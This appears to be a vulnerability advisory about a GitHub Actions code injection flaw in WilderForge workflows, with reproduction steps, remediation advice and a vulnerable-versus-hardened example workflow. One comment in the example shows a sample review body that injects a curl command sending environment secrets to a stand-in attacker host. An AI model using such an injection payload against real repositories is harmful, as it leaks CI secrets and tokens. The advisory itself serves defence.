WilderForge GitHub Actions Workflows Code Injection Vulnerability

Vulnerability

A critical code injection vulnerability has been identified in multiple WilderForge projects. It stems from the unsafe use of user-controlled expressions, such as `${{ github.event.review.body }}`, directly inside `run:` shell scripts in GitHub Actions workflows. The Actions runner expands such expressions into the script text before the shell is started, so quoting inside the script offers no protection: a review body containing shell metacharacters (a closing quote, `;`, or `$(...)`) becomes part of the command the runner executes. Any user who can submit a pull request review can therefore execute arbitrary shell commands on the Actions runner with the workflow's permissions, potentially compromising continuous integration infrastructure, secrets, and build outputs. The vulnerability affects developers working on or contributing to the affected WilderForge repositories, as well as anyone who forks these repositories and reuses the impacted workflows. End users of the software, and those who only install pre-built releases or artifacts, are not affected.

Impact

Exploitation of this vulnerability allows arbitrary command execution on the GitHub Actions runner, with the potential to read and exfiltrate any secrets exposed to the job, including the workflow's `GITHUB_TOKEN`, which has write access to the repository whenever the workflow's `permissions` grant it. With that token an attacker could make unauthorized modifications to repository content, such as overwriting files or altering release details.

Reproduction

The vulnerability can be reproduced with a workflow that is triggered by a `pull_request_review` event and references a user-controlled expression, such as `${{ github.event.review.body }}`, inside an inline `run:` script. Submitting a review whose body contains shell syntax (for example a closing double quote followed by a command, or a `$(...)` command substitution) causes the injected command to be executed on the runner when the workflow runs. Because `pull_request_review` workflows run in the context of the base repository, the job has access to the repository's secrets even when the review is left on a pull request from a fork.

Remediation

To address this vulnerability, developers should never interpolate untrusted input directly into `run:` scripts. Instead, assign the expression to an intermediate environment variable in the step's `env:` block and reference it from the script as a quoted shell variable (for example `"$REVIEW_BODY"`); the shell then treats the value as data rather than as code. Workflows should also declare a minimal `permissions:` block (read-only `contents` unless write access is genuinely required) so that a compromised job cannot push to the repository with the `GITHUB_TOKEN`. Additionally, repository owners can enable GitHub's CodeQL analysis for their workflow files to automatically flag similar injection patterns.
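The pattern described under Reproduction and Remediation above, shown as an added example workflow. This is not code from any WilderForge repository: the workflow name, job names, the `REVIEW_BODY` variable and the `attacker.example` host in the comment are placeholders chosen for illustration.

```yaml
# Added example (not WilderForge's own workflow): a minimal pull_request_review
# workflow with the injectable step next to the hardened equivalent.
name: review-triage

on:
  pull_request_review:
    types: [submitted]

# Limit what a compromised job can do with GITHUB_TOKEN: with read-only
# contents it cannot push commits or edit releases even if the step is hijacked.
permissions:
  contents: read

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # BAD: the runner expands ${{ ... }} into the script text before bash
      # starts, so a review body such as
      #   looks good"; curl -X POST --data-binary @- https://attacker.example/ <<< "$(env)"; echo "
      # closes the quote and runs arbitrary commands with the job's secrets.
      # Even a body of just $(id) is executed, because the quoting below is
      # applied to text that already contains the attacker's input.
      - name: Echo review text (injectable)
        run: |
          echo "Review says: ${{ github.event.review.body }}"

  hardened:
    runs-on: ubuntu-latest
    steps:
      # GOOD: the value reaches the shell only as an environment variable and is
      # referenced as a quoted variable, so its contents are data, not code,
      # regardless of which characters the reviewer typed.
      - name: Echo review text (safe)
        env:
          REVIEW_BODY: ${{ github.event.review.body }}
        run: |
          printf 'Review says: %s\n' "$REVIEW_BODY"
```

The same rule applies to every other attacker-controlled context, including `github.event.issue.title`, `github.event.comment.body`, `github.event.pull_request.title`, `github.head_ref` and the body of the pull request itself: route them through `env:` and quote the variable, and keep the `permissions:` block as narrow as the job allows.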

Added: Jun 9, 2025, 1:21 PM
Updated: Jun 9, 2025, 1:21 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 6.7
exploitability: 8.4
remediation: 0.0
relevance: 0.2
threat: 4.8
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.